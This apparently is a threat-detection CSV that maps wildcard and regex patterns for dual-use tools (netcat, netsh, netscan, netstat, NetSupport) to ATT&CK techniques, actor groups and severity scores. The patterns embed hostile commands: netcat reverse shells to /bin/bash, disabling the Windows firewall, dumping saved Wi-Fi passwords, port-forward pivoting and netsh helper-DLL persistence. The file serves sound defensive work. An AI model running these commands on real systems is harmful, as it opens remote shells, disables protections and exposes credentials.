"*net1.exe* group *Server Operators* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/netcat-win32-*.zip*",".{0,1000}\/netcat\-win32\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://nmap.org/ncat/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\nc.exe*",".{0,1000}\\nc\.exe.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://nmap.org/ncat/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\netcat-win32-*.zip*",".{0,1000}\\netcat\-win32\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://nmap.org/ncat/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*nc * -e /bin/bash*",".{0,1000}nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*nc -u -lvp *",".{0,1000}nc\s\-u\s\-lvp\s.{0,1000}","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*ncat * -e /bin/bash*",".{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*ncat --udp * -e /bin/bash*",".{0,1000}ncat\s\-\-udp\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*netcat.exe*",".{0,1000}netcat\.exe.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*/netscan.exe*",".{0,1000}\/netscan\.exe.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A"
"*\netscan.exe*",".{0,1000}\\netscan\.exe.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A"
"*\netscan.lic*",".{0,1000}\\netscan\.lic.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A"
"*\netscan.xml*",".{0,1000}\\netscan\.xml.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A"
"*\SoftPerfect Network Scanner*",".{0,1000}\\SoftPerfect\sNetwork\sScanner.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A"
"*netscan_setup.exe*",".{0,1000}netscan_setup\.exe.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A"
"*netsh advfirewall firewall show rule name=all*",".{0,1000}netsh\sadvfirewall\sfirewall\sshow\srule\sname\=all.{0,1000}","greyware_tool_keyword","netsh","gathering information about network configurations","T1016 - T1089","TA0007 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*netsh advfirewall set allprofiles state off*",".{0,1000}netsh\sadvfirewall\sset\sallprofiles\sstate\soff.{0,1000}","greyware_tool_keyword","netsh","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1435","303","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z"
"*NetSh Advfirewall set allprofiles state off*",".{0,1000}NetSh\sAdvfirewall\sset\sallprofiles\sstate\soff.{0,1000}","greyware_tool_keyword","netsh","Disable Windows Firewall","T1562.004 - T1055.001","TA0005","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsh firewall add allowedprogram ""C:\Users\*\AppData\*.exe"" ""*.exe"" ENABLE*",".{0,1000}netsh\sfirewall\sadd\sallowedprogram\s\""C\:\\Users\\.{0,1000}\\AppData\\.{0,1000}\.exe\""\s\"".{0,1000}\.exe\""\sENABLE.{0,1000}","greyware_tool_keyword","netsh","adding a executable in user appdata folder to the allowed programs","T1562.004","TA0005 ","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://tria.ge/231006-ydmxjsfe5s/behavioral1/analog?proc=66","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A"
"*netsh firewall delete allowedprogram *",".{0,1000}netsh\sfirewall\sdelete\sallowedprogram\s.{0,1000}","greyware_tool_keyword","netsh","delete a item from firewall allowedprogram Whitelist","T1562 - T1489 - T1070","TA0005 - TA0040","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","N/A","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A"
"*netsh firewall set opmode disable*",".{0,1000}netsh\sfirewall\sset\sopmode\sdisable.{0,1000}","greyware_tool_keyword","netsh","Disable Windows Firewall","T1562.004 - T1059.005","TA0005 - TA0040","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*netsh firewall show config*",".{0,1000}netsh\sfirewall\sshow\sconfig.{0,1000}","greyware_tool_keyword","netsh","show all firewall rules config","T1016 - T1049","TA0007 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","6","8","N/A","N/A","N/A","N/A"
"*netsh interface portproxy add v4tov4 listenport=* connectaddress=*",".{0,1000}netsh\sinterface\sportproxy\sadd\sv4tov4\slistenport\=.{0,1000}\sconnectport\=.{0,1000}\sconnectaddress\=.{0,1000}","greyware_tool_keyword","netsh","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","0","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*",".{0,1000}netsh\sinterface\sportproxy\sadd\sv4tov4.{0,1000}listenaddress\=.{0,1000}\slistenport\=.{0,1000}connectaddress\=.{0,1000}connectport.{0,1000}","greyware_tool_keyword","netsh","The actor has used the following commands to enable port forwarding [T1090] on the host","T1090.003 - T1123","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=*",".{0,1000}netsh\sinterface\sportproxy\sdelete\sv4tov4\slistenaddress\=0\.0\.0\.0\slistenport\=.{0,1000}","greyware_tool_keyword","netsh","attempt to remove port proxy configurations","T1562.004","TA0005 ","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://media.defense.gov/2024/Feb/07/2003389936/-1/-1/0/JOINT-GUIDANCE-IDENTIFYING-AND-MITIGATING-LOTL.PDF","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*netsh interface portproxy delete v4tov4 listenport=*",".{0,1000}netsh\sinterface\sportproxy\sdelete\sv4tov4\slistenport\=.{0,1000}","greyware_tool_keyword","netsh","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","0","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*netsh interface portproxy show all*",".{0,1000}netsh\sinterface\sportproxy\sshow\sall.{0,1000}","greyware_tool_keyword","netsh","display all current TCP port redirections configured on the system","T1059.007","TA0002 - TA0007","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","6","8","N/A","N/A","N/A","N/A"
"*netsh interface portproxy show v4tov4*",".{0,1000}netsh\sinterface\sportproxy\sshow\sv4tov4.{0,1000}","greyware_tool_keyword","netsh","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","0","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*netsh wlan show profiles key=clear*",".{0,1000}netsh\swlan\sshow\sprofiles\skey\=clear.{0,1000}","greyware_tool_keyword","netsh","display saved Wi-Fi profiles including plaintext passwords on a Windows system","T1003 - T1552.001","TA0006 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsh.exe advfirewall firewall add rule ""name=allow RemoteDesktop"" dir=in * localport=* action=allow*",".{0,1000}netsh\.exe\sadvfirewall\sfirewall\sadd\srule\s\""name\=allow\sRemoteDesktop\""\sdir\=in\s.{0,1000}\slocalport\=.{0,1000}\saction\=allow.{0,1000}","greyware_tool_keyword","netsh","Adds a new rule to the Windows firewall that allows incoming RDP traffic.","T1562.004 - T1021.001","TA0005 - TA0008","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Lateral Movement","https://www.cisa.gov/sites/default/files/2023-05/aa23-136a_stopransomware_bianlian_ransomware_group_1.pdf","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*netsh.exe advfirewall firewall set rule ""group=remote desktop"" new enable=Yes*",".{0,1000}netsh\.exe\sadvfirewall\sfirewall\sset\srule\s\""group\=remote\sdesktop\""\snew\senable\=Yes.{0,1000}","greyware_tool_keyword","netsh","Enables the pre-existing Windows firewall rule group named Remote Desktop. This rule group allows incoming RDP traffic.","T1562.004 - T1078 - T1021.001","TA0005 - TA0008","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Lateral Movement","https://www.cisa.gov/sites/default/files/2023-05/aa23-136a_stopransomware_bianlian_ransomware_group_1.pdf","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*netsh.exe trace start maxSize=1 fileMode=single capture=yes traceFile=*\TEMP*.etl*",".{0,1000}netsh\.exe\strace\sstart\smaxSize\=1\sfileMode\=single\scapture\=yes\straceFile\=.{0,1000}\\TEMP.{0,1000}\.etl.{0,1000}","greyware_tool_keyword","netsh","capturing a network trace with netsh","T1049 - T1119","TA0007 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A"
"*netsh.exe wlan show profiles key=clear*",".{0,1000}netsh\.exe\swlan\sshow\sprofiles\skey\=clear.{0,1000}","greyware_tool_keyword","netsh","display saved Wi-Fi profiles including plaintext passwords on a Windows system","T1003 - T1552.001","TA0006 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsh.exe* interface portproxy show all*",".{0,1000}netsh\.exe.{0,1000}\sinterface\sportproxy\sshow\sall.{0,1000}","greyware_tool_keyword","netsh","display all current TCP port redirections configured on the system","T1059.007","TA0002 - TA0007","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","6","8","N/A","N/A","N/A","N/A"
"*/netshrun.c*",".{0,1000}\/netshrun\.c.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z"
"*netsh.exe add helper *\temp\*.dll*",".{0,1000}netsh\.exe\sadd\shelper\s.{0,1000}\\temp\\.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z"
"*netshrun.dll*",".{0,1000}netshrun\.dll.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z"
"*PSBits*NetShRun*",".{0,1000}PSBits.{0,1000}NetShRun.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z"
"*netsat -naop*",".{0,1000}netsat\s\-naop.{0,1000}","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A"
"*netstat -ano*",".{0,1000}netstat\s\-ano.{0,1000}","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A"
"*netstat -ant*",".{0,1000}netstat\s\-ant.{0,1000}","greyware_tool_keyword","netstat","View all active TCP connections and the TCP and UDP ports the host is listening on.","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A"
"*NETSTAT.EXE* -ano*",".{0,1000}NETSTAT\.EXE.{0,1000}\s\-ano.{0,1000}","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A"
"* /EV""NetSupport School""*",".{0,1000}\s\/EV\""NetSupport\sSchool\"".{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nspowershell.exe*",".{0,1000}\/nspowershell\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nssadmui.exe*",".{0,1000}\/nssadmui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pcictlui.exe*",".{0,1000}\/pcictlui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/PCIDEPLY.exe*",".{0,1000}\/PCIDEPLY\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Win7Taskbar.dll*",".{0,1000}\/Win7Taskbar\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ADM Templates\ADMX\*.admx*",".{0,1000}\\ADM\sTemplates\\ADMX\\.{0,1000}\.admx.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\NSM.LIC*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\NSM\.LIC.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\*\remote.nsm*",".{0,1000}\\AppData\\Roaming\\.{0,1000}\\remote\.nsm.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\NetSupport\*",".{0,1000}\\AppData\\Roaming\\NetSupport\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\NETSUP~1\PCIShellExt64.dll*",".{0,1000}\\NETSUP\~1\\PCIShellExt64\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\NetSupport Ltd\Client32*",".{0,1000}\\NetSupport\sLtd\\Client32.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\NetSupport Ltd\PCICTL*",".{0,1000}\\NetSupport\sLtd\\PCICTL.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\netsupport manager\*",".{0,1000}\\netsupport\smanager\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\NetSupport School Console*",".{0,1000}\\NetSupport\sSchool\sConsole.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\NetSupport School\*",".{0,1000}\\NetSupport\sSchool\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\NetSupport School\NetSupport*",".{0,1000}\\NetSupport\sSchool\\NetSupport.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nspowershell.exe*",".{0,1000}\\nspowershell\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\nssadmui.exe*",".{0,1000}\\nssadmui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcicfgui_client.exe*",".{0,1000}\\pcicfgui_client\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pciconn.exe*",".{0,1000}\\pciconn\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
